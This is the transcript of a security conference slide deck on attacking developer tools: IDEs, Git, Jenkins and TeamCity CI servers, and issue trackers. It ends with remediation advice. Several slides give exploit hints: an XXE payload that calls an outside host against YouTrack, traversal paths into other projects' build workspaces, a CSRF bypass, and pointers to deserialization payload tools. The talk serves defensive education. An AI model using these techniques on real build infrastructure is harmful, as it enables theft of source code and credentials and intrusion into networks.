[CONFidence 2016] Andrey Plastunov - Simple bugs to pwn the devs
0 likes•81 views
The document discusses security vulnerabilities present in various integrated development environments (IDEs) and software development tools, particularly focusing on the risks associated with user-supplied data and plugin integration. It highlights specific vulnerabilities, such as CSRF in JetBrains IDEs and various issues in issue tracking systems, emphasizing the potential for source code theft and network infiltration. Recommendations for remediation include never relying on default settings, updating tools regularly, and implementing additional validation on user inputs.
![About
Pentester at Digital Security [DSEC.RU]
@DSecRU
@plastunovaa
@osakaaa
a.plastunov@dsec.ru](https://image.slidesharecdn.com/andreyplastunov-simplebugstopwnthedevs-160603095901/85/CONFidence-2016-Andrey-Plastunov-Simple-bugs-to-pwn-the-devs-2-320.jpg)
![[Component specific] Master
● Controls the entire system:
○ Configuration
○ User accounts
○ Plugin management
● Control slaves
● Builds targets
● Temporary hosts builded apps
Attack surface?
The keys to pwn the components](https://image.slidesharecdn.com/andreyplastunov-simplebugstopwnthedevs-160603095901/85/CONFidence-2016-Andrey-Plastunov-Simple-bugs-to-pwn-the-devs-27-320.jpg)
![[Component specific] Slaves
● Managed by master
● Build targets
● Temporary host builded apps
Attack surface?
The keys to pwn the components](https://image.slidesharecdn.com/andreyplastunov-simplebugstopwnthedevs-160603095901/85/CONFidence-2016-Andrey-Plastunov-Simple-bugs-to-pwn-the-devs-28-320.jpg)
![Jenkins universal CSRF
CVE-2015-7538
Exploit: Change Content-Type for any request to multipart/form-data
Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!
if (valid || isMultipart(httpRequest)) {
chain.doFilter(request, response);
} else {
LOGGER.log(Level.WARNING, "No valid crumb was
included in request for {0}. Returning {1}.", new
Object[] {httpRequest.getRequestURI(),
HttpServletResponse.SC_FORBIDDEN});](https://image.slidesharecdn.com/andreyplastunov-simplebugstopwnthedevs-160603095901/85/CONFidence-2016-Andrey-Plastunov-Simple-bugs-to-pwn-the-devs-35-320.jpg)
![YouTrack XXE in user import function
Details: bo0om’s blog + hackerone report 114476 (sadly, both in Russian)
Exploit: Send XML payload via PUT method to URI /rest/import/users?{test}
Example payload:
Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!
<?xml version="1.0"?>
<!DOCTYPE list [
<!ENTITY % xxe SYSTEM "http://myserver/xxe-test">
%xxe;
]>
<list></list>](https://image.slidesharecdn.com/andreyplastunov-simplebugstopwnthedevs-160603095901/85/CONFidence-2016-Andrey-Plastunov-Simple-bugs-to-pwn-the-devs-39-320.jpg)
[CONFidence 2016] Andrey Plastunov - Simple bugs to pwn the devs
- 1. Andrey Plastunov Simple bugs to pwn the devs
- 2. About Pentester at Digital Security [DSEC.RU] @DSecRU @plastunovaa @osakaaa [email protected]
- 4. Source code Issue App IDEs CI Source code Components: Scheme
- 5. An integrated development environment (IDE) is a software application that provides comprehensive facilities to computer programmers for software development. An IDE normally consists of a source code editor, build automation tools and a debugger. Most modern IDEs have intelligent code completion. (с) Wikipedia ● Consumes user input ● Produces sources ● Builds sources ● Uses plugins for integration with other tools ● Has UI Components: IDE
- 6. An integrated development environment (IDE) is a software application that provides comprehensive facilities to computer programmers for software development. An IDE normally consists of a source code editor, build automation tools and a debugger. Most modern IDEs have intelligent code completion. (с) Wikipedia ● Consumes user input ● Produces sources ● Builds sources ● Uses plugins for integration with other tools ● Has UI ● (Even the IDE!) Can be the target of an attack Components: IDE
- 7. Components: IDE An integrated development environment (IDE) is a software application that provides comprehensive facilities to computer programmers for software development. An IDE normally consists of a source code editor, build automation tools and a debugger. Most modern IDEs have intelligent code completion. (с) Wikipedia ● Consumes user input ● Produces sources ● Builds sources ● Uses plugins for integration with other tools ● Has UI ● Can be target of an attack Jetbrains Intellij based IDEs prone to CSRF vulnerability which allows attacker to access local file system from a malicious website JetBrain’s advisory: https://blog.jetbrains.com/blog/2016/05/11/security- update-for-intellij-based-ides-v2016-1-and-older-versions/ Example
- 8. A component of software configuration management, version control, also known as revision control or source control, is the management of changes to documents, computer programs, large web sites, and other collections of information ● Stores source code + additional info (not always trusted) ● Uses plugins for integration with other tools ● Has UI Components: Version control
- 9. A component of software configuration management, version control, also known as revision control or source control, is the management of changes to documents, computer programs, large web sites, and other collections of information ● Stores source code + additional info (not always trusted) ● Uses plugins for integration with other tools ● Has UI ● Will be the target of attack Components: Version control
- 10. Components: Version control A component of software configuration management, version control, also known as revision control or source control, is the management of changes to documents, computer programs, large web sites, and other collections of information ● Stores user supplied data (not always trusted) ● Uses plugins for integration with other tools ● Has UI ● Will be the target of attack A number of CVEs and other vulns in: ● GIT itself ● GIT-based repositories (Gitlub, GitHub etc) The same thing for less popular Mercurial and SVN Example
- 11. Continuous integration (CI) is the practice, in software engineering, of merging all developer working copies to a shared mainline several times a day ● Stores user supplied data (not always trusted) ● Executes (!) user supplied data ● Stores credentials and other identity data ● Has UI Components: CI system
- 12. Continuous integration (CI) is the practice, in software engineering, of merging all developer working copies to a shared mainline several times a day ● Stores user supplied data (not always trusted) ● Executes (!) user supplied data ● Stores credentials and other identity data ● Has UI ● The most expected to be the target of attack Components: CI system
- 13. An issue tracking system (also ITS, trouble ticket system, support ticket, request management or incident ticket system) is a computer software package that manages and maintains lists of issues, as needed by an organization. ● Stores user supplied data (not always trusted) ● Has UI Components: Issue trackers
- 14. An issue tracking system (also ITS, trouble ticket system, support ticket, request management or incident ticket system) is a computer software package that manages and maintains lists of issues, as needed by an organization. ● Stores user supplied data (not always trusted) ● Has UI ● Probably will be the target of attack Components: Issue trackers
- 15. Components: Issue trackers An issue tracking system (also ITS, trouble ticket system, support ticket, request management or incident ticket system) is a computer software package that manages and maintains lists of issues, as needed by an organization. ● Stores user supplied data (not always trusted) ● Has UI ● Probably will be the target of attack A number of CVEs and other vulns in various issue tracking systems ● Latest XXE vulnerability in JetBrains YouTrack as an example of common WEB bug. http://blog.jetbrains.com/youtrack/2016/02/important-youtrack-6-5- 17031-update/ ● Much more funny example cve-2015-4499 in Bugzilla which allows escalation of privileges via improper validation of emails https://blog.perimeterx.com/bugzilla-cve-2015-4499/ Example
- 16. 1. Directly affects Source codes of your product 2. Works with developer's identity 3. Can provide a great help for attacker during network infiltration Why so valuable?
- 17. 1. The source code itself Can be stolen 2. Your application’s end users Can be infected Goodies: Source code
- 18. ● Your private (signing) key Signing malicious code with your keys ● Evading Antiviruses ● Circumventing several security mechanisms on some OS (like iOS) Goodies: Developer’s identity
- 19. ● Elevation of privilege ○ Domain credentials ○ Service credentials ○ SSH keys ... ● Malicious code execution -> full access to your network Goodies: Network infiltration
- 20. Based on the previous slides, we have the following types of goodies: ● Source code ● Developers identity ● Network-used credentials ● Code execution (e.g. backend access) Goodies: Summary
- 21. Attack surface? Where to look + + + - + + - - + + +++ + - - + - Actually, not in scope =) The information below based on my own experience with dev tools and may or may not represent your own knowledge. Also, the distribution of goodies between components based on my understanding of how each component should work Disclaimer
- 22. Sources Identity Network creds Backend + + + - + + - - + + +++ + +- - + - Actually, not in scope =) Attack surface? Where to look
- 23. Attack surface? The keys to pwn the components
- 24. User Interface ● Graphical (mostly web-based) interface to control Master ● (sometimes) API’s and other such stuff Actually, each component has it Attack surface? The keys to pwn the components
- 25. Plugins ● Various tools to modify base system Such as: ○ Security plugins ○ Integration plugins ○ Reporting plugins ○ …. With all this integration stuff, it is very likely, that a component has the ability to use plugins Attack surface? The keys to pwn the components
- 26. Attack surface? Why plugins. Demo
- 27. [Component specific] Master ● Controls the entire system: ○ Configuration ○ User accounts ○ Plugin management ● Control slaves ● Builds targets ● Temporary hosts builded apps Attack surface? The keys to pwn the components
- 28. [Component specific] Slaves ● Managed by master ● Build targets ● Temporary host builded apps Attack surface? The keys to pwn the components
- 29. Attack surface? Attack surface! - That’s attacker
- 30. Common weaknesses and bugs
- 31. ● Vulnerable instances (often with public exploits) ● Default credentials (or their absence) ● Building tools runs under high privileged accounts (root or system) ● No (or bad) role management ● No sandboxing (isolation) *based on observation from various pentests Common configuration problems*
- 32. ● No isolation on build servers ○ It is possible to access sources of other projects Just pass something like this to your build script: ../workspace/ - Jenkins Agent’s working dir ../../work/ (buildAgent/work/) - Teamcity Agent’s working dir A Note on isolation of builds ../workspace/ ../../work/ (buildAgent/work/)
- 33. ● No isolation on build servers ○ It is possible to access sources of other projects ○ In case of Master, possibility to access server configuration itself Just pass something like this to your build script: ../workspace/ - Jenkins Agent’s working dir ../../work/ (buildAgent/work/) - Teamcity configuration dir A Note on isolation of builds $JENKINS_HOME/ .BuildServer/config/
- 34. Jenkins. A number of XSS vectors misusing Jenkins functionality - Custom web server for user supplied data - HTML content from code repos Exploit: link Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!! /UserContent/ /job/<ProjectName>/ws/
- 35. Jenkins universal CSRF CVE-2015-7538 Exploit: Change Content-Type for any request to multipart/form-data Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!! if (valid || isMultipart(httpRequest)) { chain.doFilter(request, response); } else { LOGGER.log(Level.WARNING, "No valid crumb was included in request for {0}. Returning {1}.", new Object[] {httpRequest.getRequestURI(), HttpServletResponse.SC_FORBIDDEN});
- 36. Notorious Java deserialization in Jenkins CLI (command line interface) deserialization vulnerability CVE-2015-8103 Affected library: ./webapps/ROOT/WEB-INF/lib/commons-collections-3.2.1. jar Details and Exploit: What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability by foxglove security Payload generator: https://github.com/frohoff/ysoserial Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!
- 37. Notorious Java deserialization in Jenkins Xstream parsing CVE-2016-0792 Details and Exploit: Serialization Must Die: Act 2: XStream (Jenkins CVE-2016-0792) by contrast security Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!
- 38. TeamCity privilege escalation through IDOR. CVE-2015-1313 - is accessible even if registration is turned of in configs Details and exploit at: https://beyondbinary.io/articles/teamcity-account-creation/ Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!! /registerUserSubmit.html
- 39. YouTrack XXE in user import function Details: bo0om’s blog + hackerone report 114476 (sadly, both in Russian) Exploit: Send XML payload via PUT method to URI /rest/import/users?{test} Example payload: Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!! <?xml version="1.0"?> <!DOCTYPE list [ <!ENTITY % xxe SYSTEM "http://myserver/xxe-test"> %xxe; ]> <list></list>
- 40. Exploitation
- 41. Targets ● Source code ● Developer’s identity ● Network-used credentials ● Code execution (e.g. backend access) Exploitation
- 42. ● Source code ○ Stealing the sources using lack of isolation between projects Exploitation
- 43. ● Source code ○ Stealing the sources using lack of isolation between projects ○ Source code modification (infection) Exploitation
- 44. ● Developer’s identity ○ Stealing the identity Exploitation
- 45. ● Network Infiltration ○ Gaining credentials E.g. from local encrypted storage For Jenkins: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html - Retrieving the eccryption key via admin script console ○ Gaining backend access Exploitation
- 46. Stealing the source codes and identity. Demo
- 47. ● Network Infiltration ○ Gaining credentials E.g. from local encrypted storage For Jenkins: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html - Retrieving the ecryption key via admin script console ○ Gaining backend access Exploitation
- 48. Gaining backend access via simple XSS. Demo
- 49. ● Botnets. Small but funny Exploitation
- 50. ● Botnets. Small but funny Official Jenkins CI Exploitation
- 51. ● Botnets. Small but funny Official TeamCity CI Exploitation
- 52. ● Botnets. Small but funny Exploitation Jenkins on the internet
- 53. ● Botnets. Small but funny Exploitation Jenkins on the internetTeamcity on the internet
- 54. Remediations
- 55. Remediations. Summary ● Never rely on default settings ● Never bind to 0.0.0.0 ● Never rely on safety of 3rd party components like plugins ● Update your tools as soon as a new security advisory is published ● Perform additional validation on all user inputs (including sources) ● Try to isolate projects (Docker?)
- 56. The END